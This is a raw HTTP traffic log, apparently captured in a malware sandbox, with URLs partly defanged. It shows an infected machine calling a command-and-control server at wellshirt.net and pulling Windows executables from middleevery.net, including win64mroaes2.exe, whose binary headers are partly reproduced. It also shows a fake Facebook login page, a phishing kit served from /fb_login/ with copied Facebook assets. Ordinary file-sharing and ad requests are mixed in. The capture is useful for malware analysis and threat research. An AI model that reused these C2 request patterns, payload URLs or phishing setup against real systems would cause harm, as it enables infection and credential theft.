P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: max-age=864000
Expires: Mon, 09 Jun 2014 15:56:13 GMT
Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT
Accept-Ranges: bytes
Content-Length: 741
Content-Type: image/png
Age: 0
Connection: close
Server: YTS/1.20.28
.PNG........IHDR...0... .....>.......IDATh.c...?.>...h3..#.>5.).B.r=5.._...FH.@.3..........Hy..`b..g .H.n.I....5>..b..7L.......0;...L!...d......3.[.X|3...:..&...1bgw.W....,Z*.O.|....PwK.~ {.x..../..#<..df.%...7s.~..t....8.t/.&.3....A..A. '...g#.0.=@r..U......!..<..=....:..|.:..:J...!......t.z.F.K..C>.H..p...5$.AH.B.=0Z.S....G^.@..\|\y..zb.....y.X...W.|.... 9..Tx.cKF...L...1Z.K.6....tl.DVO..XY.$.......W.c.h\......@.G....? ..g...`...`.T..|.....R......p...5$.."Q#...W.K.?F...!E u.I....p1.....b.d.. ..e..&.$..2c...._>..........S~.y....7MF.W.&7.h..6.&..q.d.122(...c..f.......r..-#! .b./....GL.~..7..x9...`s,6.. ..1I..v....sr..L.`.0..$D..M...0B'.C?..9...''O_zr.....v^.....d.\,.My...a..................7Hp0..h1....h6. .........6...f....IEND.B`...
GET /forum/search.php?method=hostname&host=VVV.facebook.com&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: wellshirt.net
HTTP/1.0 200 OK
Date: Fri, 30 May 2014 15:56:12 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28
..........................
GET /fb_login/index_files/zWUlWu-0Z1T.css?session=3b528200 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Accept: text/css,*/*;q=0.1
Referer: hXXp://middleevery.net/fb_login/
Connection: close
Accept-Language: en-US,*
Host: middleevery.net
HTTP/1.1 200 OK
Date: Fri, 30 May 2014 15:56:13 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT
Accept-Ranges: bytes
Content-Length: 49960
Content-Type: text/css
Age: 0
Connection: close
Server: YTS/1.20.28
/*1364176131,178142495*/...._24n .body ._24x{color:#333}.._6nw ._24n .body ._24x{color:#4e5665}.._24n .body ._24x:hover{text-decoration:none}.._24n .body a.signature{color:#3b5998;display:inline}.._24n .body a.signature:hover{text-decoration:underline}.._24n .hover:hover .title ._24x{text-decoration:underline}.._24n .forceRTL{direction:rtl;text-align:right;display:block}.._24n .forceLTR{direction:ltr;text-align:left;display:block}.._24n .adInfo a.identity{color:gray;display:block;white-space:nowrap}.._6nw ._24n .adInfo a.identity{color:#898f9c}.._24n .title{font-weight:bold;margin-bottom:0 !important}.._24n .image_body_block{padding-top:3px}.._24n .uiUfi{width:auto}.._24n .fbEmuHidePoll .otherdiv .other{width:206px}.._24n .ads_rhc_close{opacity:0}.._24n:hover .old_x, ._24n:hover .uiSelectorButton, ._24n:hover .ads_rhc_close, ._24n .ads_rhc_close.openToggler, .emu_x .openToggler .uiSelectorButton{opacity:1}..fbEmuHidePoll .undo{float:right;padding-left:2px;padding-bottom:2px;margin-bottom:3px;margin-left:5px}..fbEmuHidePoll .fbEmuXTitle{font-weight:bold}..fbEmuHidePoll .fbEmuXSubtitle{margin-bottom:10px}..fbEmuHideThanks .fbEmuXThanksTitle{font-weight:bold;margin-bottom:10px}..fbEmuBlock .fbEmuHidePoll .otherdiv{margin-left:20px}..emu_x{float:right}..emu_x .uiSelectorButton{opacity:0}..old_x{opacity:0}..fbEmuMainBody .firstPassiveName{font-weight:bold}..fbEmuPremium .fbEmuStreamAttachment{margin-bottom:3px}..fbEmuStreamStory .fbEmuStreamAttachment.fbEmuStreamOGAction{border-top:1px solid #e5e7eb;border-bottom:1p
<<
<<< skipped >>>
GET /forum/search.php?method=hostname&host=VVV.facebook.com&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: wellshirt.net
HTTP/1.0 200 OK
Date: Fri, 30 May 2014 15:55:38 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28
..........................
GET /forum/search.php?method=dep&noxor&file=exefile&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: wellshirt.net
HTTP/1.0 200 OK
Date: Fri, 30 May 2014 15:56:08 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 2
Server: YTS/1.20.28
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'c./c..|c..|c..|.M.|`..|}P.|{..|}P.|...|D..|d..|c..|...|}P.|Y..|}P.|b..|Richc..|................PE..L....|pS..........................................@.......................................................................... ..P.......................................................................@.......................`....................text... ........................... ..`.rdata...9.......:..................@..@.data........0...r..................@.....................................................................................................................................................................................................................................................................................................................................................................................................................................................8.A..I........V....8.A..6....D$..t.V..........^................L$..T$.V.t$.W...r...;.u.............s...tD.....9 .u1...v5..B...y. .u ...v$..B...y. .u....v...B...I. ...._...^._3.^..................3.f..$.\$...$..$SU.D$.V.t$(....L$(....D$(..W.....vC..T$...sC.....>..T$,....D$,.l$..D$,....D$,.........vC..........vC..l$...Az<...vC......vC...@vC..L$,.D$,...vC....sC..T$,.D$,.........sC.......t$(.\$..........l$..\$..D$..%X.A..%P.A.......N.f.D$. .3...~(................N..,..,..N.@ ....;.|.....-8uC...DqC...8uC
<<
<<< skipped >>>
GET /fb_login/index_files/276449379149296_367648155.png?session=3b528200 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Referer: hXXp://middleevery.net/fb_login/
Accept: */*
Connection: close
Accept-Language: en-US,*
Host: middleevery.net
HTTP/1.1 200 OK
Date: Fri, 30 May 2014 15:56:13 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: max-age=864000
Expires: Mon, 09 Jun 2014 15:56:13 GMT
Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT
Accept-Ranges: bytes
Content-Length: 3600
Content-Type: image/png
Age: 0
Connection: close
Server: YTS/1.20.28
.PNG........IHDR...7...3.....3J.P....IDATh...YtTU.....{g.,........a....TP@Ep....a..9.....::z@Q2.C&``p..}C.A..........N...>U..G.....s...u..V.w_..{...b..,...cTM9E.I.Q....Q'..Z:..G?y.......V.-............L..(?M..H.`..."...D..G3..on\q.Z..t.H(.UuKh.\.Q..Z....._..p4.tz...'...Gw....ex.I]FI5N4lU....Wd.k.. ..7...d[.;....{k..'.i`R.._Uw.VP......Qc....Fg.K5...G.......un.....>..$.9\.Tg.......K.%Z'....n..Q.k.z.YT..i....f...I.n........ .U?6..5.....D.7....q.|O..Y~....T....X....a.z....`X=4'.l.8...Uc..P.yk.........MB..O.N.q7..V.#HFR.lbAaA........w..g..M..O,."...E.{.. ....b\..X.Q2.."#.R8h.(...k. H...F.:l.BY?<..N.qyY........R.5R. uv....XY.[.q.@......G..8..zi.l...g.J......5.....g...pWS'.8.^.J......CR..u...C>...B.'...N.q*%..&......_.J...H.........ED#...N.q.9&y..g...h..F.<.v!MR...e./...7...W...'/.,.o.'x....M..G:.7X,.l.&}Q.e..O.N.q..7.o...T..&.S<6g.......jK..*.Cz...I.#Q..O.NZ....w...o.}...s..?.V.....H....}...wy$Eg.a.....Y.Z.bR..`.......Z|S..4Ml.h...f.(AA....7...TC...........ac$.=M....~#MS9J..n.)..4-z.\.Q...1#a#...Q.O.$.8.%.....m../..on.........p..D*..9w.thq...7.X...y.J.W['.8...ol...-..?<......D9.7..h.\.....\'.$...Uu..X.B.2..>y....__lu.O......ns{C... S...AP.^|...D....%..........X.B.f..U..4.?.Vr...."...}e...`...s..........y...c..............'wn.....r4..$.NX..%?H..N.(...!..._L1..Z............\....B..KR..y.['R.EK..V3n(....b.*...s..x"....U.S.qW.N..i.>e.:.}....?*....J....@.s..R.kM7h%ZA.v..............3:...s\k...f..*..S....@..-3..........-..]M;!..8@..g).J.0P..#..Cr...)G$.(...6.P:*K.E!.......W..yb?2z.N.8....T.....;.
<<
<<< skipped >>>
GET /pagead/conversion/1072568869/?random=1401447789574&cv=7&fst=1401447789574&num=1&fmt=3&value=0&label=nJZCCOiW1wEQpbS4_wM&bg=ffffff&hl=en&guid=ON&u_h=768&u_w=1024&u_ah=740&u_aw=1024&u_cd=32&u_his=1&u_tz=180&u_java=false&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.fileswap.com/ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Referer: hXXp://VVV.fileswap.com/
Accept: */*
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: VVV.googleadservices.com
HTTP/1.1 302 Found
P3P: policyref="hXXp://VVV.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
Date: Fri, 30 May 2014 15:56:12 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
Location: hXXp://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072568869/?random=1968204886&cv=7&fst=1401447789574&num=1&fmt=3&value=0&label=nJZCCOiW1wEQpbS4_wM&bg=ffffff&hl=en&guid=ON&u_h=768&u_w=1024&u_ah=740&u_aw=1024&u_cd=32&u_his=1&u_tz=180&u_java=false&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.fileswap.com/&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&convclickts=0
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 42
X-XSS-Protection: 1; mode=block
Alternate-Protocol: 80:quic
GIF89a.............!.......,...........D.;..
GET /dep/win64mroaes2.exe HTTP/1.0
Accept: */*
Connection: close
Host: middleevery.net
HTTP/1.0 200 OK
Date: Fri, 30 May 2014 15:55:42 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Sat, 24 May 2014 19:51:01 GMT
Accept-Ranges: bytes
Content-Length: 2956800
Content-Type: application/octet-stream
Age: 0
Server: YTS/1.20.28
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...(..S.................."...-..\............@...............................-.....s.-.............................................. -......0-.d$............*.|"............-.TG.......................... p-.(....................8-.X............................text.....".......".................`.p`.data.........#.......".............@....rdata........#.......#.............@.`@.pdata..|"....*..$...z*.............@.0@.xdata........ ....... .............@.@@.bss.....[....,.......................`..edata....... -.......,.............@.0@.idata..d$...0-..&....,.............@.0..CRT....p....`-.......,.............@.@..tls....h....p-.......,.............@.`..reloc..TG....-..H....,.............@.0B.................................................................................................................................................................................................ffffff.........H..(1.f.=....MZ....,.........,.........,.........,.....tg....,.....,...tH........".H........e".....,.H....-.H....-.H... -.....j"..=h.#..tf1.H..(........."......Hc.....H..B...H...:PE..u...J.f....t?f......j............].........1.......K...f.H...j"...j".1.H..(..zt...,.........1............H..8....,.D....,.L....,.H....,.H....,.....,.H....,.H.D$ ...".....,.H..8.........AUATUWVSH......D....,.1......H.T$ E..H...H.......eH..%0...1.H.X.H.=.)-..........H9...'..........H...H...|.-.H..u...y.-.1........
<<
<<< skipped >>>
GET /_js/AC_OETags.js HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Accept: */*
Referer: hXXp://VVV.fileswap.com/
Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: VVV.fileswap.com
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 May 2014 15:56:11 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 7812
Last-Modified: Mon, 10 Sep 2012 19:25:00 GMT
Connection: keep-alive
ETag: "504e3e8c-1e84"
Expires: Sat, 31 May 2014 15:56:11 GMT
Cache-Control: max-age=86400
X-Frame-Options: DENY
Accept-Ranges: bytes
// Flash Player Version Detection - Rev 1.6.// Detect Client Browser type.// Copyright(c) 2005-2006 Adobe Macromedia Software, LLC. All rights reserved..var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false;.var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false;.var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false;..function ControlVersion().{..var version;..var axo;..var e;...// NOTE : new ActiveXObject(strFoo) throws an exception if strFoo isn't in the registry...try {...// version will be set for 7.X or greater players...axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");...version = axo.GetVariable("$version");..} catch (e) {..}...if (!version)..{...try {....// version will be set for 6.X players only....axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6");........// installed player is some revision of 6.0....// GetVariable("$version") crashes for versions 6.0.22 through 6.0.29,....// so we have to be careful. ........// default to the first public version....version = "WIN 6,0,21,0";.....// throws if AllowScripAccess does not exist (introduced in 6.0r47)......axo.AllowScriptAccess = "always";.....// safe to call for 6.0r47 or greater....version = axo.GetVariable("$version");....} catch (e) {...}..}...if (!version)..{...try {....// version will be set for 4.X or 5.X player....axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.3");....version = axo.GetVariable("$version");...} catch (e) {...}..}...if (!version)..{...try
<<
<<< skipped >>>
GET /_images/ico_24_social.png HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Referer: hXXp://VVV.fileswap.com/
Accept: */*
Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: VVV.fileswap.com
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 May 2014 15:56:12 GMT
Content-Type: image/png
Content-Length: 1696
Last-Modified: Mon, 10 Sep 2012 19:24:59 GMT
Connection: keep-alive
ETag: "504e3e8b-6a0"
Expires: Sat, 31 May 2014 15:56:12 GMT
Cache-Control: max-age=86400
X-Frame-Options: DENY
Accept-Ranges: bytes
.PNG........IHDR..............w=.....tEXtSoftware.Adobe ImageReadyq.e<...SiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134342, 2010/01/10-18:06:43 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="uuid:257E611FF3B9E111ADFFA94C7A3A3204" xmpMM:DocumentID="xmp.did:2514A6C4E30D11E1A651ECCBB496C13E" xmpMM:InstanceID="xmp.iid:2514A6C3E30D11E1A651ECCBB496C13E" xmp:CreatorTool="Adobe Photoshop CS5"> <xmpMM:DerivedFrom stRef:instanceID="uuid:54EEA7D7DECDE111A8DDAB7BBB8AB66E" stRef:documentID="uuid:257E611FF3B9E111ADFFA94C7A3A3204"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...C....IDATx...]HSa.....C.0.M.*.e.s.@..3%D...].}7}\y..Wb.Ht.EhD.....^4B.0......)s&....t.gg=......@"......9...<......q..........o...PZ[.q.q..&....b..\L...s..sg@IM.DQ.z.PO{{.@...Db1D..H....x44t..A6.U.X$i..$...hT.p0......u<...&.zz..O.<.q`&.y(e2..Ji.x<....z...........k."M.\.... l&.....dj...l6oV...l.@e.b<.f............,}...GD.9i..)..DA../..@.]Z.e........(.......].,.,....RCIk...."...D?l.....3!..e..c........;.4..."/.J....F.....0x....\.p8....u.j..Rz1.}i...N..;../....E.V......Ys.|f.....^.\...H..~D..$g.:f.....T_ ..Z..-.{...........[...'E.
<<
<<< skipped >>>
GET /_images/header_upload.png HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Referer: hXXp://VVV.fileswap.com/
Accept: */*
Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: VVV.fileswap.com
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 May 2014 15:56:12 GMT
Content-Type: image/png
Content-Length: 939
Last-Modified: Mon, 10 Sep 2012 19:24:59 GMT
Connection: keep-alive
ETag: "504e3e8b-3ab"
Expires: Sat, 31 May 2014 15:56:12 GMT
Cache-Control: max-age=86400
X-Frame-Options: DENY
Accept-Ranges: bytes
.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...MIDATx..W.kSq.>....<....i...N.R..B''...D....Q...8.d...`....`....A(us.S..M....y...~.g.....*d.....^.;.9.w..4M....a.....8...K". .0...X,..f#UUI.$1......p.. ...c......ON.s)..V.W".e.....Z.G..`6..N2.v...\&.Y..-`.m..i.....>.o.....82&P(.(.N_.....s.kK.J..L.........@ 0...y..v.]..."%w0.."........^.w.Q...\.8t\.4r.....<..Dm09.](.?....YD.c.2...\L.....L.Q..@.CK.B[m..9:.".>......2....(..J..H...j...!...)...~......;.........8`d?.&.....?......]B.h.1.5.q.7#0....=}..ss..i..(p.K.... .,k....N!..b...<vP.@m....b..jY...Q{;.....#.B9....).6Gt......(..N\T......kN.<3.U.....8.../,...........H.N...$.....@...#...%.`w..4.y..7...'...).3.. Q....}.H.fo...bU...F-)@.....Y*..t~WD/k2..evvh'...a#..X,..B.s...-..h5.L.K!5.{ACa...W5R`". ...?....K..*..l=...oP...b/_bh.e.@K.`..h.v.)c..E..M..M.l..188......X............-......,.......S.>bq.u..."......W-....<.6..c...0.......L....:M`O...x.m[h.In....IEND.B`.....
GET /_images/statement_bg.jpg HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Referer: hXXp://VVV.fileswap.com/
Accept: */*
Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: VVV.fileswap.com
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 May 2014 15:56:12 GMT
Content-Type: image/jpeg
Content-Length: 112505
Last-Modified: Mon, 10 Sep 2012 19:25:00 GMT
Connection: keep-alive
ETag: "504e3e8c-1b779"
Expires: Sat, 31 May 2014 15:56:12 GMT
Cache-Control: max-age=86400
X-Frame-Options: DENY
Accept-Ranges: bytes
......Exif..II*.................Ducky.......<.....&Adobe.d................H...{..V....w..............................................................................................................................................................................................................................@P`p01............................................................... 0@P1`p!AQ.aq...........................&...D.*....B.....(....%............@b.........nP.....%....(".WpP...f@......P.........).@...........R.....5......D..........Y..........SR........3d......@... ....Z.@...Z.....E...(....*.@(...]@....@.".(..P. %..P.$...B... .. ...f...%......P.......h...D..nP...,............l.....h..@....$..(........b........,... ...2K.........@SR........3d......@..P ...@RY@.........E...(.......E............@%..J.$.."*... .(@.U... ....3f@.....B..J.......(P......@...f.................*......%............d.........nZ..................R...............P(..P....@.D.@5-,..@,...D...@.`..(....]`.. .P...J....H.@DT..(@.P.$.e.(@.....Y........,.....K".......(...1`.....K@...f...................7-".....@.............!...........7(..P@....3`..@..(...(..@..-D.PX....P....Q...P...P..(...G=........@%.".P$.."*... A(@.P.. .....3d...........@.!.......nP.... .........!.......r.....P....$......@..........7(P.....(..............(.............P..............Y@...@...-.......@P ...lnP.%X..@.".(..*. %..P.$.".B...)A. ....l.............P3d..P...7(....D.P........$......jP.... .............b........E......`...........r.....@..f.......P(..P ...@Z.@.e..P
<<
<<< skipped >>>
GET /_images/footer_bg2.png HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Referer: hXXp://VVV.fileswap.com/
Accept: */*
Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: VVV.fileswap.com
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 May 2014 15:56:12 GMT
Content-Type: image/png
Content-Length: 134
Last-Modified: Fri, 14 Sep 2012 15:15:38 GMT
Connection: keep-alive
ETag: "50534a1a-86"
Expires: Sat, 31 May 2014 15:56:12 GMT
Cache-Control: max-age=86400
X-Frame-Options: DENY
Accept-Ranges: bytes
.PNG........IHDR.............u.4J....tEXtSoftware.Adobe ImageReadyq.e<...(IDATx.b```.e..B ..D...&8......Y....g..0.(D.{........IEND.B`...
GET /fb_login/index_files/safe_image.png?session=3b528200 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Referer: hXXp://middleevery.net/fb_login/
Accept: */*
Connection: close
Accept-Language: en-US,*
Host: middleevery.net
HTTP/1.1 200 OK
Date: Fri, 30 May 2014 15:56:13 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: max-age=864000
Expires: Mon, 09 Jun 2014 15:56:13 GMT
Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT
Accept-Ranges: bytes
Content-Length: 140
Content-Type: image/png
Age: 0
Connection: close
Server: YTS/1.20.28
.PNG........IHDR.............v..9...SIDAT(...1..@.........*..I... .`....%-3.................r...S....y.. .@`*2FRy}..}.H.du5.........IEND.B`...
GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b528200 HTTP/1.0
Accept: */*
Connection: close
Host: welltalk.net
HTTP/1.1 500 Internal Server Error
Date: Fri, 30 May 2014 15:55:34 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 671
Content-Type: text/html; charset=iso-8859-1
Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>500 Internal Server Error</title>.</head><body>.<h1>Internal Server Error</h1>.<p>The server encountered an internal error or.misconfiguration and was unable to complete.your request.</p>.<p>Please contact the server administrator,. admin@paperboy.co.jp and inform them of the time the error occurred,.and anything you might have done that may have.caused the error.</p>.<p>More information about this error may be available.in the server error log.</p>.<p>Additionally, a 500 Internal Server Error.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>...
GET /fb_login/index_files/kHhQaysvKcA.js?session=3b528200 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Accept: */*
Referer: hXXp://middleevery.net/fb_login/
Connection: close
Accept-Language: en-US,*
Host: middleevery.net
HTTP/1.1 200 OK
Date: Fri, 30 May 2014 15:56:13 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT
Accept-Ranges: bytes
Content-Length: 14114
Content-Type: application/x-javascript
Age: 0
Connection: close
Server: YTS/1.20.28
/*1364176096,178142559*/..if (self.CavalryLogger) { CavalryLogger.start_js(["2iC7r"]); }..__d("legacy:fbdesktop-detect",["FBDesktopDetect"],function(a,b,c,d){a.FbDesktopDetect=b('FBDesktopDetect');},3);.__d("IndexLogoutSponsorship",["Event","URI","ge"],function(a,b,c,d,e,f){var g=b('Event'),h=b('URI'),i=b('ge'),j;function k(n){return setTimeout(function(){h('/index.php').addQueryData({l_s:'r'}).go();},n);}function l(n,o){var p=false,q=function(){if(p)return;clearTimeout(j);j=k(o);},r=function(){clearTimeout(j);p=true;};g.listen(document,{mousedown:r,mouseup:r,click:r,keydown:r,mousemove:q});if(n!==null){g.listen(n,'mouseover',function(){g.listen(window,'blur',r);});var s=i('email');try{s.focus();}catch(t){}}}var m={init:function(n,o){j=k(o);l(n,o);}};e.exports=m;});.__d("IntlUtils",["AsyncRequest","Cookie","goURI"],function(a,b,c,d,e,f){var g=b('AsyncRequest'),h=b('Cookie'),i=b('goURI'),j={setXmode:function(k){(new g()).setURI('/ajax/intl/save_xmode.php').setData({xmode:k}).setHandler(function(){document.location.reload();}).send();},setAmode:function(k){new g().setURI('/ajax/intl/save_xmode.php').setData({amode:k,app:false}).setHandler(function(){document.location.reload();}).send();},setLocale:function(k,l,m,n){if(!m)m=k.options[k.selectedIndex].value;j.saveLocale(m,true,null,l,n);},saveLocale:function(k,l,m,n,o){new g().setURI('/ajax/intl/save_locale.php').setData({aloc:k,source:n,app_only:o}).setHandler(function(p){if(l){document.location.reload();}else i(m);}).send();},setLocaleCookie:function(k,l){h.set('
<<
<<< skipped >>>
GET /fb_login/index_files/z15ZzhgIj4W.css?session=3b528200 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Accept: text/css,*/*;q=0.1
Referer: hXXp://middleevery.net/fb_login/
Connection: close
Accept-Language: en-US,*
Host: middleevery.net
HTTP/1.1 200 OK
Date: Fri, 30 May 2014 15:56:13 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT
Accept-Ranges: bytes
Content-Length: 158
Content-Type: text/css
Age: 0
Connection: close
Server: YTS/1.20.28
/*1364177031,178142523*/..._52ls{margin:0 auto 0 auto;padding-bottom:30px}..timelineSignUpDialog ._52ls{padding-bottom:0}..#bootloader_1hHU5 { height: 42px; }..
GET /forum/search.php?method=dep&noxor&file=dropbox.dep&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: wellshirt.net
HTTP/1.0 200 OK
Date: Fri, 30 May 2014 15:55:38 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28
